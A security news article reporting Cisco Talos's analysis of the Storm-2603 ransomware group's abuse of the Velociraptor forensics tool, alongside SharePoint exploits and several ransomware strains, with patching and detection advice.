The ransomware gang caught exploiting Microsoft SharePoint zero-days over the summer has added a new tool to its arsenal: Velociraptor, an open-source digital forensics and incident response app not previously tied to ransomware incidents.
In August, Cisco’s Talos incident response team dealt with a ransomware attack in which the criminals deployed Warlock, LockBit, and Babuk ransomware to encrypt VMware ESXi virtual machines and Windows servers, and used Velociraptor to maintain stealthy access while they encrypted the victim organization’s files.
“Talos assesses with moderate confidence that this activity can be attributed to the group Storm-2603,” Talos’ researchers Michael Szeliga, Aliza Johnson, and Jaeson Schultz said in a Thursday threat report.
Possible PRC ties
Storm-2603 is a newish crew that first emerged in July after Microsoft caught the criminals abusing vulnerable on-premises SharePoint servers to deploy ransomware. At the time, Redmond said it suspected the criminals were based in China, although they were not necessarily a government-backed group.
However, in a separate report published this month, anti-ransomware firm Halcyon said Storm-2603 has “some ties to Chinese nation-state actors,” and is the same group also tracked as Warlock and CL-CRI-1040, as well as being a LockBit affiliate.
The gang typically uses Warlock and LockBit ransomware in its attacks, although this is the first time it’s deployed Babuk malware, according to Talos. And if using three ransomware variants to infect one victim sounds like overkill: that’s another Storm-2603 hallmark.
“It is highly unusual for actors to use two different ransomware variants in the same attack, increasing our confidence that this activity could be related to Storm-2603,” the Talos team wrote.
Velociraptor is a legitimate software tool used by network defenders for threat hunting and incident response. It uses agents deployed across Windows, Linux, and macOS endpoints to continuously collect data and monitor for suspicious activity that could indicate a security incident.
And, much like other open-source and commercial software products, Velociraptor has now been repurposed by criminals for use in their operations. Because it’s a legitimate product and not malware, it’s harder to detect and block with antivirus or security tools.
In this particular attack, Velociraptor played a “significant role,” according to Talos.
After breaking into the network, Storm-2603 installed an outdated version of Velociraptor (version 0.73.4.0) that was exposed to a privilege escalation vulnerability (CVE-2025-6264) that could lead to arbitrary command execution and endpoint takeover. The open source tool allowed them to remain hidden from defenders’ views, exploit the security hole, and deploy LockBit and Babuk.
Likely initial access via SharePoint bugs
“While Talos was unable to observe how the actor obtained initial access due to limited access to the victim organization’s data, both their exposure to the ToolShell vulnerabilities and our attribution to Storm-2603 increase the likelihood that initial access was gained through ToolShell exploitation,” the researchers said.
After installing Velociraptor on multiple servers to maintain persistence, the attackers executed a command to run Smbexec, a Python script that comes with Impacket and allows the user to launch programs remotely using the SMB protocol.
Storm-2603 also modified Active Directory, turning off the “real-time protection” feature that continually monitors endpoints for malware and viruses, and disabling the behavior monitoring and file monitoring capabilities.
Then they deployed a fileless PowerShell script with encryption functionality – this is what Talos believes to be the primary encryptor that deployed mass encryption on the Windows machines.
Additionally, Talos found ransomware executables on Windows machines that were identified by EDR products as LockBit, and encrypted files with the Warlock extension “xlockxlock.”
- Microsoft: SharePoint attacks now officially include ransomware infections
- Microsoft patches critical SharePoint 2016 zero-days amid active exploits
- CISA releases malware analysis for Sharepoint Server attack
- 3 more infamous cybercrime crews team up to ‘maximize income’ in ‘challenging’ ransomware biz
“There was also a Linux binary on ESXi servers flagged as the Babuk encryptor, which achieved only partial encryption and appended files with ‘.babyk’. Storm-2603 has not previously leveraged Babuk ransomware, based on public reporting,” the researchers said.
The criminals conducted a double-extortion attack, using a PowerShell script to exfiltrate data before encrypting systems. And the exfiltration script shows that “$ProgressPreference” is set to “SilentlyContinue,” which also allowed the extortionists to evade detection by suppressing any visual indication of the command’s progress.
To avoid becoming Storm-2603’s next victim, make sure your organization has patched the SharePoint vulnerabilities, as it appears that the ransomware gang continues to abuse these holes for initial access.
Additionally, Rapid7, which maintains Velociraptor, has published recommendations on how to detect the tool’s misuse, so give that a read, too. ®
